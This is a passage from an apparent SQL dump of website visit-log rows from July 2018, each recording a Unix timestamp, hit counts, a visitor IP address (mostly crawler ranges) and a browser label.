72848,1531494918,4,4,0,0,'216.244.66.241','other'),(272849,1531494925,1,1,0,0,'54.36.148.175','other'),(272850,1531495553,1,1,0,0,'54.36.148.137','other'),(272851,1531495704,1,1,0,0,'54.36.148.253','other'),(272852,1531495755,1,1,0,0,'95.163.255.169','other'),(272853,1531495791,1,1,0,0,'54.36.149.74','other'),(272854,1531495833,1,1,0,0,'54.36.148.172','other'),(272855,1531496079,1,1,0,0,'8.29.198.26','other'),(272856,1531496115,1,1,0,0,'144.76.166.14','other'),(272857,1531496191,1,1,0,0,'54.36.149.68','other'),(272858,1531496365,1,1,0,0,'54.36.148.133','other'),(272859,1531496434,1,1,0,0,'54.36.148.116','other'),(272860,1531496659,2,2,0,0,'62.80.185.138','chrome'),(272861,1531496774,1,1,0,0,'54.36.148.137','other'),(272862,1531496960,3,3,0,0,'216.244.66.241','other'),(272863,1531497276,1,0,1,0,'66.249.69.232',''),(272864,1531497284,1,1,0,0,'188.230.43.254','other'),(272865,1531497378,1,1,0,0,'54.36.148.236','other'),(272866,1531497422,1,1,0,0,'54.36.148.242','other'),(272867,1531497469,1,1,0,0,'54.36.148.140','other'),(272868,1531497782,1,1,0,0,'54.36.148.76','other'),(272869,1531497787,1,1,0,0,'54.36.148.103','other'),(272870,1531497833,1,1,0,0,'54.36.149.57','other'),(272871,1531498019,1,1,0,0,'54.36.149.62','other'),(272872,1531498145,1,1,0,0,'54.36.148.181','other'),(272873,1531498221,1,1,0,0,'54.36.149.14','other'),(272874,1531498415,1,1,0,0,'54.36.148.174','other'),(272875,1531499302,1,1,0,0,'54.36.149.60','other'),(272876,1531499388,1,1,0,0,'54.36.149.65','other'),(272877,1531499481,1,1,0,0,'91.196.178.135','chrome'),(272878,1531499623,1,1,0,0,'54.36.148.22','other'),(272879,1531499677,1,1,0,0,'188.230.43.254','other'),(272880,1531499719,1,1,0,0,'54.36.148.236','other'),(272881,1531499776,1,1,0,0,'8.29.198.27','other'),(272882,1531499844,1,1,0,0,'54.36.148.148','other'),(272883,1531499939,1,1,0,0,'54.36.148.128','other'),(272884,1531499955,1,1,0,0,'54.36.148.191','other'),(272885,1531500093,1,1,0,0,'54.36.148.162','other'),(272886,1531500150,1,1,0,0,'54.36.148.166','other'),(272887,1531500307,1,1,0,0,'216.244.66.241','other'),(272888,1531500643,1,1,0,0,'54.36.148.187','other'),(272889,1531500893,1,1,0,0,'54.36.148.63','other'),(272890,1531500903,1,1,0,0,'54.36.148.65','other'),(272891,1531501038,1,1,0,0,'95.163.255.159','other'),(272892,1531501055,1,1,0,0,'54.36.148.69','other'),(272893,1531501198,1,1,0,0,'54.36.149.89','other'),(272894,1531501212,1,1,0,0,'91.196.178.86','firefox'),(272895,1531501484,1,1,0,0,'54.36.148.166','other'),(272896,1531501693,1,1,0,0,'54.36.148.12','other'),(272897,1531501946,1,1,0,0,'54.36.148.40','other'),(272898,1531501977,1,1,0,0,'91.196.178.131','chrome'),(272899,1531502008,1,1,0,0,'141.8.142.74','other'),(272900,1531502193,1,1,0,0,'216.244.66.241','other'),(272901,1531502423,1,1,0,0,'54.36.148.123','other'),(272902,1531502743,1,1,0,0,'54.36.149.22','other'),(272903,1531503267,1,1,0,0,'54.36.149.81','other'),(272904,1531503406,1,1,0,0,'54.36.149.26','other'),(272905,1531503465,1,1,0,0,'54.36.148.71','other'),(272906,1531503482,1,1,0,0,'54.36.149.76','other'),(272907,1531503794,1,1,0,0,'54.36.148.85','other'),(272908,1531504016,1,1,0,0,'54.36.148.170','other'),(272909,1531504043,1,1,0,0,'54.36.148.12','other'),(272910,1531504045,1,1,0,0,'54.36.149.92','other'),(272911,1531504292,1,1,0,0,'54.36.148.244','other'),(272912,1531504304,1,1,0,0,'54.36.149.97','other'),(272913,1531504346,1,1,0,0,'54.36.149.73','other'),(272914,1531504355,1,1,0,0,'178.154.171.88','other'),(272915,1531504446,1,1,0,0,'54.36.148.76','other'),(272916,1531504550,1,1,0,0,'54.36.148.107','other'),(272917,1531504692,1,1,0,0,'54.36.148.197','other'),(272918,1531504710,1,1,0,0,'54.36.148.118','other'),(272919,1531504820,6,6,0,0,'216.244.66.241','other'),(272920,1531504822,1,1,0,0,'54.36.149.36','other'),(272921,1531504976,1,1,0,0,'54.36.148.126','other'),(272922,1531505127,1,1,0,0,'54.36.148.41','other'),(272923,1531505142,1,1,0,0,'54.36.148.106','other'),(272924,1531505267,1,1,0,0,'54.36.148.54','other'),(272925,1531505352,1,1,0,0,'188.230.43.254','other'),(272926,1531505465,1,1,0,0,'54.36.148.248','other'),(272927,1531505544,2,2,0,0,'92.113.189.235','chrome'),(272928,1531505811,1,1,0,0,'37.73.80.143','chrome'),(272929,1531505887,1,1,0,0,'54.36.148.14','other'),(272930,1531505897,1,1,0,0,'54.36.148.142','other'),(272931,1531506163,1,1,0,0,'54.36.148.176','other'),(272932,1531506314,1,1,0,0,'54.36.148.164','other'),(272933,1531506346,1,1,0,0,'54.36.149.40','other'),(272934,1531506417,1,1,0,0,'54.36.148.17','other'),(272935,1531506537,1,1,0,0,'54.36.148.144','other'),(272936,1531506678,1,1,0,0,'54.36.149.43','other'),(272937,1531506727,1,1,0,0,'54.36.148.131','other'),(272938,1531506734,1,1,0,0,'54.36.149.8','other'),(272939,1531506866,1,1,0,0,'54.36.149.33','other'),(272940,1531506929,1,1,0,0,'8.29.198.26','other'),(272941,1531507114,1,1,0,0,'54.36.148.84','other'),(272942,1531507748,1,1,0,0,'54.36.148.75','other'),(272943,1531507771,2,2,0,0,'216.244.66.241','other'),(272944,1531507773,1,1,0,0,'54.36.149.51','other'),(272945,1531507922,1,1,0,0,'54.36.148.252','other'),(272946,1531508175,1,1,0,0,'54.36.148.72','other'),(272947,1531508567,1,1,0,0,'54.36.148.181','other'),(272948,1531508582,1,1,0,0,'54.36.148.177','other'),(272949,1531508596,1,1,0,0,'54.36.149.85','other'),(272950,1531508604,1,1,0,0,'54.36.148.83','other'),(272951,1531508658,1,1,0,0,'54.36.148.187','other'),(272952,1531509034,1,1,0,0,'54.36.148.255','other'),(272953,1531509303,1,1,0,0,'54.36.148.41','other'),(272954,1531509895,1,1,0,0,'54.36.148.102','other'),(272955,1531509957,1,1,0,0,'54.36.149.96','other'),(272956,1531510067,1,1,0,0,'54.36.148.157','other'),(272957,1531510094,1,1,0,0,'54.36.149.29','other'),(272958,1531510104,3,3,0,0,'216.244.66.241','other'),(272959,1531510214,1,1,0,0,'54.36.148.126','other'),(272960,1531510357,1,1,0,0,'54.36.148.77','other'),(272961,1531510559,1,1,0,0,'54.36.148.185','other'),(272962,1531510627,1,1,0,0,'8.29.198.27','other'),(272963,1531510676,1,1,0,0,'54.36.148.239','other'),(272964,1531510778,1,1,0,0,'54.36.148.192','other'),(272965,1531510916,1,1,0,0,'54.36.148.20','other'),(272966,1531511044,1,1,0,0,'54.36.148.201','other'),(272967,1531511325,1,1,0,0,'54.36.148.80','other'),(272968,1531511339,1,1,0,0,'141.8.142.74','other'),(272969,1531511357,1,1,0,0,'54.36.148.156','other'),(272970,1531511424,1,1,0,0,'216.244.66.241','other'),(272971,1531511488,1,1,0,0,'54.36.148.90','other'),(272972,1531511750,1,1,0,0,'54.36.149.47','other'),(272973,1531511760,1,1,0,0,'54.36.148.125','other'),(272974,1531511877,1,1,0,0,'54.36.148.227','other'),(272975,1531511916,1,1,0,0,'54.36.149.33','other'),(272976,1531512421,1,1,0,0,'54.36.148.154','other'),(272977,1531512656,3,3,0,0,'216.244.66.241','other'),(272978,1531512664,1,1,0,0,'54.36.148.108','other'),(272979,1531512699,1,1,0,0,'54.36.148.100','other'),(272980,1531512743,1,1,0,0,'54.36.148.200','other'),(272981,1531512763,1,1,0,0,'54.36.148.198','other'),(272982,1531513223,1,1,0,0,'54.36.148.85','other'),(272983,1531513542,1,1,0,0,'54.36.148.104','other'),(272984,1531513797,1,1,0,0,'54.36.149.5','other'),(272985,1531513845,1,1,0,0,'54.36.148.49','other'),(272986,1531514205,1,1,0,0,'54.36.149.73','other'),(272987,1531514348,1,1,0,0,'54.36.149.56','other'),(272988,1531514417,1,1,0,0,'54.36.148.227','other'),(272989,1531514475,1,1,0,0,'157.55.39.233','other'),(272990,1531514515,1,1,0,0,'54.36.148.137','other'),(272991,1531514644,1,1,0,0,'54.36.148.108','other'),(272992,1531514779,1,1,0,0,'54.36.148.39','other'),(272993,1531514792,1,1,0,0,'54.36.148.69','other'),(272994,1531515210,1,1,0,0,'178.154.171.88','other'),(272995,1531515571,1,1,0,0,'54.36.149.11','other'),(272996,1531515667,1,1,0,0,'216.244.66.241','other'),(272997,1531515779,1,1,0,0,'54.36.149.60','other'),(272998,1531515817,1,1,0,0,'54.36.148.189','other'),(272999,1531515970,1,1,0,0,'54.36.148.76','other'),(273000,1531516001,1,1,0,0,'54.36.148.236','other'),(273001,1531516248,1,1,0,0,'54.36.149.17','other'),(273002,1531516314,1,1,0,0,'54.36.148.231','other'),(273003,1531516326,1,1,0,0,'54.36.148.208','other'),(273004,1531516412,1,1,0,0,'54.36.149.90','other'),(273005,1531516585,1,1,0,0,'54.36.148.210','other'),(273006,1531516877,1,1,0,0,'54.36.148.225','other'),(273007,1531516884,1,1,0,0,'54.36.148.46','other'),(273008,1531516960,1,0,1,0,'66.249.69.93',''),(273009,1531516995,1,1,0,0,'54.36.148.135','other'),(273010,1531517314,1,1,0,0,'54.36.149.86','other'),(273011,1531517474,1,1,0,0,'54.36.149.93','other'),(273012,1531517780,1,1,0,0,'8.29.198.26','other'),(273013,1531517840,1,1,0,0,'54.36.148.164','other'),(273014,1531517873,1,1,0,0,'54.36.148.153','other'),(273015,1531518048,1,1,0,0,'54.36.149.19','other'),(273016,1531518055,5,5,0,0,'216.244.66.241','other'),(273017,1531518185,1,1,0,0,'54.36.149.105','other'),(273018,1531518475,1,1,0,0,'54.36.148.72','other'),(273019,1531518601,1,1,0,0,'54.36.149.67','other'),(273020,1531518645,1,1,0,0,'54.36.148.14','other'),(273021,1531518696,1,1,0,0,'54.36.148.89','other'),(273022,1531518835,1,1,0,0,'54.36.148.194','other'),(273023,1531519207,1,1,0,0,'54.36.149.36','other'),(273024,1531519525,1,1,0,0,'54.36.149.42','other'),(273025,1531519531,1,1,0,0,'54.36.149.64','other'),(273026,1531519724,1,1,0,0,'54.36.148.14','other'),(273027,1531519779,1,1,0,0,'54.36.148.211','other'),(273028,1531519810,1,1,0,0,'54.36.149.19','other'),(273029,1531519976,4,4,0,0,'216.244.66.241','other'),(273030,1531520299,1,1,0,0,'54.36.148.216','other'),(273031,1531520673,1,1,0,0,'54.36.148.47','other'),(273032,1531520864,2,2,0,0,'141.8.142.74','other'),(273033,1531520921,1,1,0,0,'54.36.148.67','other'),(273034,1531521141,1,1,0,0,'54.36.148.223','other'),(273035,1531521245,1,0,1,0,'66.249.69.93',''),(273036,1531521472,1,1,0,0,'8.29.198.26','other'),(273037,1531521548,1,0,1,0,'66.249.69.167',''),(273038,1531521576,1,1,0,0,'54.36.148.147','other'),(273039,1531521586,1,1,0,0,'54.36.148.138','other'),(273040,1531521677,1,1,0,0,'54.36.148.128','other'),(273041,1531521784,1,1,0,0,'54.36.148.238','other'),(273042,1531521865,1,1,0,0,'54.36.148.98','other'),(273043,1531522101,1,1,0,0,'54.36.148.196','other'),(273044,1531522132,1,1,0,0,'54.36.148.215','other'),(273045,1531522463,1,1,0,0,'141.8.142.74','other'),(273046,1531522479,1,1,0,0,'216.244.66.241','other'),(273047,1531522597,1,1,0,0,'54.36.148.132','other'),(273048,1531523056,1,1,0,0,'54.36.149.29','other'),(273049,1531523437,1,1,0,0,'54.36.148.237','other'),(273050,1531523693,1,1,0,0,'141.8.142.74','other'),(273051,1531523773,1,1,0,0,'54.36.148.91','other'),(273052,1531523979,1,1,0,0,'54.36.149.20','other'),(273053,1531524064,1,1,0,0,'54.36.148.25','other'),(273054,1531524209,1,1,0,0,'54.36.148.227','other'),(273055,1531524649,1,1,0,0,'54.36.148.46','other'),(273056,1531524662,1,1,0,0,'54.36.148.26','other'),(273057,1531524727,1,1,0,0,'141.8.142.74','other'),(273058,1531524782,1,1,0,0,'54.36.148.98','other'),(273059,1531524838,1,1,0,0,'54.36.148.173','other'),(273060,1531524848,1,1,0,0,'54.36.149.82','other'),(273061,1531525096,2,2,0,0,'216.244.66.241','other'),(273062,1531525102,1,1,0,0,'54.36.148.218','other'),(273063,1531525180,1,1,0,0,'91.209.11.236','other'),(273064,1531525233,1,1,0,0,'54.36.148.80','other'),(273065,1531525415,1,1,0,0,'54.36.148.235','other'),(273066,1531525609,1,1,0,0,'54.36.149.31','other'),(273067,1531525834,1,1,0,0,'54.36.148.23','other'),(273068,1531525913,1,1,0,0,'141.8.142.74','other'),(273069,1531526090,1,1,0,0,'54.36.149.45','other'),(273070,1531526123,1,1,0,0,'54.36.149.93','other'),(273071,1531526716,1,1,0,0,'54.36.148.96','other'),(273072,1531526752,1,1,0,0,'54.36.148.31','other'),(273073,1531526778,1,1,0,0,'54.36.148.207','other'),(273074,1531526781,1,1,0,0,'54.36.149.88','other'),(273075,1531526984,1,1,0,0,'54.36.148.114','other'),(273076,1531527115,2,0,2,0,'66.249.69.89',''),(273077,1531527124,1,1,0,0,'54.36.149.105','other'),(273078,1531527337,1,1,0,0,'54.36.149.101','other'),(273079,1531527689,1,1,0,0,'54.36.148.245','other'),(273080,1531527912,1,1,0,0,'54.36.148.217','other'),(273081,1531527926,1,1,0,0,'54.36.149.21','other'),(273082,1531528056,1,1,0,0,'54.36.148.144','other'),(273083,1531528611,1,1,0,0,'54.36.149.26','other'),(273084,1531528621,1,1,0,0,'8.29.198.26','other'),(273085,1531528639,1,1,0,0,'54.36.148.152','other'),(273086,1531528741,3,3,0,0,'216.244.66.241','other'),(273087,1531528763,1,1,0,0,'54.36.148.33','other'),(273088,1531528959,1,1,0,0,'54.36.149.90','other'),(273089,1531528986,1,1,0,0,'141.8.142.74','other'),(273090,1531529231,1,1,0,0,'54.36.148.196','other'),(273091,1531529369,1,1,0,0,'54.36.148.169','other'),(273092,1531529402,1,1,0,0,'54.36.148.65','other'),(273093,1531529509,1,1,0,0,'66.249.69.89','chrome'),(273094,1531529952,1,1,0,0,'54.36.149.105','other'),(273095,1531530335,1,1,0,0,'54.36.148.248','other'),(273096,1531530704,3,3,0,0,'216.244.66.241','other'),(273097,1531530818,1,1,0,0,'54.36.148.76','other'),(273098,1531530844,1,1,0,0,'54.36.148.15','other'),(273099,1531530974,1,1,0,0,'54.36.148.205','other'),(273100,1531531490,1,1,0,0,'54.36.148.146','other'),(273101,1531531561,1,1,0,0,'54.36.149.74','other'),(273102,1531531579,1,1,0,0,'54.36.149.67','other'),(273103,1531531682,1,1,0,0,'54.36.148.140','other'),(273104,1531531701,1,1,0,0,'54.36.148.156','other'),(273105,1531531906,1,1,0,0,'54.36.148.10','other'),(273106,1531532061,1,1,0,0,'54.36.148.178','other'),(273107,1531532071,1,1,0,0,'54.36.148.152','other'),(273108,1531532299,1,1,0,0,'54.36.148.176','other'),(273109,1531532313,1,1,0,0,'8.29.198.25','other'),(273110,1531532315,1,1,0,0,'54.36.149.26','other'),(273111,1531532377,1,1,0,0,'54.36.148.182','other'),(273112,1531532530,1,1,0,0,'91.196.178.104','chrome'),(273113,1531532576,1,1,0,0,'54.36.148.157','other'),(273114,1531532608,1,1,0,0,'54.36.148.93','other'),(273115,1531532768,1,1,0,0,'54.36.148.142','other'),(273116,1531532947,1,1,0,0,'54.36.148.199','other'),(273117,1531533013,1,0,1,0,'66.249.69.163',''),(273118,1531533028,1,0,1,0,'66.249.69.167',''),(273119,1531533258,1,1,0,0,'54.36.148.122','other'),(273120,1531533276,1,1,0,0,'54.36.149.13','other'),(273121,1531533564,2,2,0,0,'216.244.66.241','other'),(273122,1531533654,1,1,0,0,'54.36.148.177','other'),(273123,1531533901,1,1,0,0,'54.36.148.18','other'),(273124,1531534006,1,1,0,0,'95.28.230.92','msie'),(273125,1531534658,1,1,0,0,'95.27.248.171','msie'),(273126,1531534673,1,1,0,0,'54.36.149.51','other'),(273127,1531534933,1,1,0,0,'54.36.148.192','other'),(273128,1531535200,1,1,0,0,'54.36.148.34','other'),(273129,1531535288,1,1,0,0,'54.36.148.130','other'),(273130,1531535603,2,2,0,0,'216.244.66.241','other'),(273131,1531535634,1,1,0,0,'54.36.148.143','other'),(273132,1531535879,1,1,0,0,'54.36.148.230','other'),(273133,1531536233,1,1,0,0,'54.36.148.80','other'),(273134,1531536263,1,1,0,0,'54.36.148.153','other'),(273135,1531536272,1,1,0,0,'54.36.149.29','other'),(273136,1531536310,1,1,0,0,'54.36.148.30','other'),(273137,1531536325,1,1,0,0,'54.36.149.93','other'),(273138,1531536902,2,2,0,0,'141.8.142.74','other'),(273139,1531536952,1,1,0,0,'54.36.149.14','other'),(273140,1531536979,1,1,0,0,'54.36.148.133','other'),(273141,1531537517,2,2,0,0,'216.244.66.241','other'),(273142,1531537550,1,1,0,0,'54.36.148.23','other'),(273143,1531537849,1,1,0,0,'54.36.148.206','other'),(273144,1531538096,1,1,0,0,'87.250.224.46','other'),(273145,1531538152,1,1,0,0,'54.36.149.5','other'),(273146,1531538464,1,1,0,0,'54.36.148.46','other'),(273147,1531538483,2,2,0,0,'217.182.253.12','other'),(273148,1531538897,1,1,0,0,'141.8.142.74','other'),(273149,1531538917,2,2,0,0,'216.244.66.241','other'),(273150,1531539125,1,1,0,0,'54.36.149.62','other'),(273151,1531539193,1,1,0,0,'54.36.149.36','other'),(273152,1531539466,1,1,0,0,'8.29.198.27','other'),(273153,1531539485,1,1,0,0,'54.36.148.27','other'),(273154,1531539835,1,1,0,0,'141.8.142.74','other'),(273155,1531540083,1,1,0,0,'54.36.148.59','other'),(273156,1531540339,1,1,0,0,'54.36.149.57','other'),(273157,1531541242,1,1,0,0,'54.36.148.225','other'),(273158,1531541539,1,1,0,0,'141.8.142.74','other'),(273159,1531541603,1,1,0,0,'54.36.148.94','other'),(273160,1531541670,1,1,0,0,'54.36.148.115','other'),(273161,1531541745,1,0,1,0,'66.249.69.163',''),(273162,1531541800,1,1,0,0,'54.36.149.75','other'),(273163,1531541997,1,1,0,0,'54.36.148.197','other'),(273164,1531542074,1,1,0,0,'54.36.149.24','other'),(273165,1531542211,1,1,0,0,'54.36.149.25','other'),(273166,1531542432,1,1,0,0,'40.77.167.63','other'),(273167,1531542597,2,2,0,0,'216.244.66.241','other'),(273168,1531542620,1,1,0,0,'54.36.148.123','other'),(273169,1531542638,1,1,0,0,'54.36.148.254','other'),(273170,1531542843,1,1,0,0,'54.36.148.221','other'),(273171,1531543152,1,1,0,0,'8.29.198.25','other'),(273172,1531543275,1,1,0,0,'46.211.25.141','chrome'),(273173,1531543320,1,1,0,0,'141.8.142.74','other'),(273174,1531543491,1,1,0,0,'54.36.149.38','other'),(273175,1531543636,1,1,0,0,'54.36.148.240','other'),(273176,1531543916,1,1,0,0,'54.36.148.11','other'),(273177,1531543973,1,1,0,0,'216.244.66.241','other'),(273178,1531544015,1,1,0,0,'54.36.148.89','other'),(273179,1531544154,1,1,0,0,'54.36.148.172','other'),(273180,1531544276,1,1,0,0,'54.36.149.36','other'),(273181,1531544295,1,1,0,0,'54.36.149.73','other'),(273182,1531544564,1,1,0,0,'141.8.142.74','other'),(273183,1531544596,1,1,0,0,'54.36.149.100','other'),(273184,1531544886,1,1,0,0,'54.36.148.140','other'),(273185,1531545304,1,1,0,0,'54.36.148.112','other'),(273186,1531545348,1,1,0,0,'54.36.148.68','other'),(273187,1531545716,1,1,0,0,'216.244.66.241','other'),(273188,1531545919,1,1,0,0,'54.36.149.45','other'),(273189,1531546137,1,1,0,0,'54.36.148.127','other'),(273190,1531546224,1,1,0,0,'54.36.148.74','other'),(273191,1531546430,1,1,0,0,'54.36.148.28','other'),(273192,1531546624,3,3,0,0,'216.244.66.241','other'),(273193,1531546768,1,1,0,0,'54.36.148.46','other'),(273194,1531546874,1,1,0,0,'54.36.149.81','other'),(273195,1531546903,1,1,0,0,'54.36.148.210','other'),(273196,1531547022,1,1,0,0,'54.36.149.3','other'),(273197,1531547089,2,2,0,0,'141.8.142.74','other'),(273198,1531547278,1,1,0,0,'54.36.148.27','other'),(273199,1531547376,1,1,0,0,'54.36.149.26','other'),(273200,1531547983,1,1,0,0,'54.36.148.84','other'),(273201,1531548195,1,1,0,0,'54.36.149.51','other'),(273202,1531548244,1,1,0,0,'66.249.69.89','chrome'),(273203,1531548350,1,1,0,0,'54.36.148.98','other'),(273204,1531548694,1,1,0,0,'54.36.148.28','other'),(273205,1531548816,1,1,0,0,'54.36.148.109','other'),(273206,1531549195,1,1,0,0,'54.36.149.97','other'),(273207,1531549268,1,1,0,0,'54.36.148.186','other'),(273208,1531549348,1,1,0,0,'216.244.66.241','other'),(273209,1531549389,1,1,0,0,'54.36.149.60','other'),(273210,1531549412,1,1,0,0,'54.36.148.137','other'),(273211,1531549476,1,1,0,0,'54.36.148.98','other'),(273212,1531549477,1,1,0,0,'54.36.149.11','other'),(273213,1531549490,1,1,0,0,'207.46.13.210','other'),(273214,1531549548,1,1,0,0,'54.36.148.202','other'),(273215,1531550279,1,1,0,0,'54.36.148.23','other'),(273216,1531550286,1,1,0,0,'54.36.149.8','other'),(273217,1531550299,1,1,0,0,'8.29.198.27','other'),(273218,1531550442,1,1,0,0,'54.36.149.48','other'),(273219,1531550775,1,1,0,0,'54.36.148.140','other'),(273220,1531550864,1,1,0,0,'54.36.148.115','other'),(273221,1531550903,1,1,0,0,'54.36.149.85','other'),(273222,1531550954,1,1,0,0,'54.36.149.32','other'),(273223,1531551007,1,1,0,0,'54.36.149.42','other'),(273224,1531551135,1,1,0,0,'54.36.149.69','other'),(273225,1531551216,1,1,0,0,'54.36.148.26','other'),(273226,1531551244,1,1,0,0,'54.36.148.102','other'),(273227,1531551367,1,1,0,0,'54.36.148.109','other'),(273228,1531551471,2,2,0,0,'91.196.178.66','chrome'),(273229,1531551578,1,1,0,0,'54.36.148.161','other'),(273230,1531551748,1,1,0,0,'54.36.149.106','other'),(273231,1531551790,1,1,0,0,'54.36.149.26','other'),(273232,1531551825,1,1,0,0,'216.244.66.241','other'),(273233,1531552141,1,1,0,0,'54.36.148.70','other'),(273234,1531552604,1,1,0,0,'54.36.148.103','other'),(273235,1531553339,1,1,0,0,'54.36.148.213','other'),(273236,1531553418,1,1,0,0,'54.36.148.179','other'),(273237,1531553436,1,1,0,0,'54.36.148.163','other'),(273238,1531553451,1,1,0,0,'178.154.171.88','other'),(273239,1531553994,1,1,0,0,'8.29.198.26','other'),(273240,1531554076,1,1,0,0,'54.36.148.57','other'),(273241,1531554250,1,1,0,0,'54.36.149.0','other'),(273242,1531554348,1,1,0,0,'54.36.148.49','other'),(273243,1531554353,2,2,0,0,'216.244.66.241','other'),(273244,1531554436,1,1,0,0,'54.36.148.145','other'),(273245,1531554485,1,1,0,0,'54.36.148.138','other'),(273246,1531554490,1,1,0,0,'54.36.148.34','other'),(273247,1531554521,1,0,1,0,'66.249.69.91',''),(273248,1531554852,1,1,0,0,'54.36.148.72','other'),(273249,1531555099,1,1,0,0,'178.154.171.88','other'),(273250,1531555133,1,1,0,0,'54.36.148.21','other'),(273251,1531555228,1,1,0,0,'144.76.6.230','other'),(273252,1531555236,1,0,1,0,'66.249.69.167',''),(273253,1531555292,1,0,1,0,'66.249.69.89',''),(273254,1531555495,1,1,0,0,'54.36.148.209','other'),(273255,1531555573,1,1,0,0,'54.36.148.141','other'),(273256,1531555609,1,1,0,0,'54.36.148.174','other'),(273257,1531555826,1,1,0,0,'66.249.69.167','chrome'),(273258,1531555831,1,1,0,0,'216.244.66.241','other'),(273259,1531555836,1,1,0,0,'54.36.149.106','other'),(273260,1531555849,1,1,0,0,'54.36.148.200','other'),(273261,1531556180,1,1,0,0,'54.36.148.55','other'),(273262,1531556412,1,1,0,0,'54.36.148.185','other'),(273263,1531556423,1,1,0,0,'54.36.149.59','other'),(273264,1531556724,1,1,0,0,'91.196.178.77','chrome'),(273265,1531556981,2,2,0,0,'216.244.66.241','other'),(273266,1531557464,1,1,0,0,'54.36.149.91','other'),(273267,1531557535,1,1,0,0,'91.196.178.136','firefox'),(273268,1531557644,1,1,0,0,'54.36.148.60','other'),(273269,1531557655,1,1,0,0,'141.8.142.74','other'),(273270,1531557680,1,1,0,0,'54.36.148.194','other'),(273271,1531557926,1,0,1,0,'66.249.69.93',''),(273272,1531557949,1,1,0,0,'54.36.148.18','other'),(273273,1531558321,1,1,0,0,'54.36.148.229','other'),(273274,1531558345,2,2,0,0,'92.113.189.235','chrome'),(273275,1531558611,1,1,0,0,'54.36.148.110','other'),(273276,1531558768,1,1,0,0,'178.154.171.88','other'),(273277,1531558814,2,2,0,0,'108.59.8.80','other'),(273278,1531558817,1,1,0,0,'54.36.149.69','other'),(273279,1531558907,1,1,0,0,'54.36.148.104','other'),(273280,1531559084,1,1,0,0,'54.36.149.75','other'),(273281,1531559241,1,1,0,0,'54.36.148.145','other'),(273282,1531559279,1,1,0,0,'54.36.148.239','other'),(273283,1531559470,1,1,0,0,'54.36.148.185','other'),(273284,1531559486,1,1,0,0,'216.244.66.241','other'),(273285,1531560070,1,1,0,0,'54.36.148.85','other'),(273286,1531560143,1,1,0,0,'54.36.148.47','other'),(273287,1531560182,1,1,0,0,'54.36.149.5','other'),(273288,1531560256,1,1,0,0,'157.55.39.233','other'),(273289,1531560449,1,1,0,0,'54.36.149.69','other'),(273290,1531560495,1,1,0,0,'54.36.148.114','other'),(273291,1531561072,6,6,0,0,'216.244.66.241','other'),(273292,1531561074,1,1,0,0,'54.36.148.141','other'),(273293,1531561167,1,1,0,0,'8.29.198.25','other'),(273294,1531561276,1,1,0,0,'54.36.148.110','other'),(273295,1531561480,1,1,0,0,'54.36.149.71','other'),(273296,1531561660,1,1,0,0,'54.36.148.27','other'),(273297,1531561827,1,1,0,0,'54.36.149.97','other'),(273298,1531562023,1,1,0,0,'54.36.149.33','other'),(273299,1531562030,1,1,0,0,'54.36.148.159','other'),(273300,1531562102,2,2,0,0,'54.36.148.227','other'),(273301,1531562410,1,1,0,0,'54.36.148.74','other'),(273302,1531562822,1,1,0,0,'54.36.148.47','other'),(273303,1531563725,1,1,0,0,'54.36.149.71','other'),(273304,1531563914,1,1,0,0,'54.36.149.92','other'),(273305,1531563953,1,1,0,0,'54.36.149.28','other'),(273306,1531564379,1,1,0,0,'54.36.148.242','other'),(273307,1531564382,1,1,0,0,'54.36.148.167','other'),(273308,1531564422,1,1,0,0,'54.36.149.67','other'),(273309,1531564629,1,1,0,0,'216.244.66.241','other'),(273310,1531564837,1,1,0,0,'8.29.198.27','other'),(273311,1531565002,11,11,0,0,'157.55.39.233','other'),(273312,1531565013,9,9,0,0,'207.46.13.210','other'),(273313,1531565022,7,7,0,0,'40.77.167.63','other'),(273314,1531565177,1,1,0,0,'54.36.149.71','other'),(273315,1531565205,1,1,0,0,'54.36.148.23','other'),(273316,1531565315,1,1,0,0,'54.36.148.253','other'),(273317,1531565324,1,1,0,0,'54.36.148.51','other'),(273318,1531565550,1,1,0,0,'54.36.148.233','other'),(273319,1531565629,1,1,0,0,'54.36.148.159','other'),(273320,1531566065,1,1,0,0,'54.36.148.156','other'),(273321,1531566110,1,1,0,0,'54.36.149.37','other'),(273322,1531566147,1,1,0,0,'54.36.148.21','other'),(273323,1531566202,1,1,0,0,'54.36.148.105','other'),(273324,1531566550,1,1,0,0,'54.36.148.146','other'),(273325,1531566619,1,1,0,0,'54.36.148.196','other'),(273326,1531566637,1,1,0,0,'54.36.149.9','other'),(273327,1531566663,1,1,0,0,'141.8.142.74','other'),(273328,1531566724,1,1,0,0,'54.36.148.101','other'),(273329,1531567005,2,2,0,0,'216.244.66.241','other'),(273330,1531567299,1,1,0,0,'66.249.69.169','chrome'),(273331,1531567368,1,1,0,0,'54.36.148.76','other'),(273332,1531567538,2,2,0,0,'95.163.255.115','other'),(273333,1531567590,1,1,0,0,'95.163.255.104','other'),(273334,1531567631,1,1,0,0,'54.36.149.43','other'),(273335,1531567948,1,1,0,0,'54.198.3.15','other'),(273336,1531568544,1,1,0,0,'54.36.148.175','other'),(273337,1531568948,1,1,0,0,'54.36.148.11','other'),(273338,1531569127,1,1,0,0,'54.36.149.5','other'),(273339,1531569179,1,1,0,0,'54.36.149.82','other'),(273340,1531569229,1,1,0,0,'54.36.148.57','other'),(273341,1531569240,1,1,0,0,'54.36.148.61','other'),(273342,1531569289,1,1,0,0,'54.36.148.212','other'),(273343,1531569378,1,1,0,0,'54.36.148.229','other'),(273344,1531569443,1,1,0,0,'54.36.148.115','other'),(273345,1531569494,1,1,0,0,'54.36.148.211','other'),(273346,1531569542,1,1,0,0,'54.36.149.43','other'),(273347,1531569705,1,1,0,0,'54.36.148.208','other'),(273348,1531570327,1,1,0,0,'40.77.167.143','other'),(273349,1531570383,1,1,0,0,'54.36.148.250','other'),(273350,1531570530,1,1,0,0,'157.55.39.233','other'),(273351,1531571015,2,2,0,0,'54.36.148.137','other'),(273352,1531571040,1,1,0,0,'54.36.148.190','other'),(273353,1531571335,3,3,0,0,'216.244.66.241','other'),(273354,1531571709,1,1,0,0,'54.36.148.141','other'),(273355,1531571972,1,0,1,0,'66.249.69.91',''),(273356,1531572028,1,1,0,0,'8.29.198.27','other'),(273357,1531572077,1,1,0,0,'54.36.148.217','other'),(273358,1531572262,1,1,0,0,'54.36.148.152','other'),(273359,1531572328,1,1,0,0,'54.36.148.254','other'),(273360,1531572396,1,1,0,0,'216.244.66.241','other'),(273361,1531572420,1,1,0,0,'91.196.178.77','chrome'),(273362,1531572992,1,1,0,0,'54.36.148.101','other'),(273363,1531573009,1,1,0,0,'54.36.148.175','other'),(273364,1531573047,1,1,0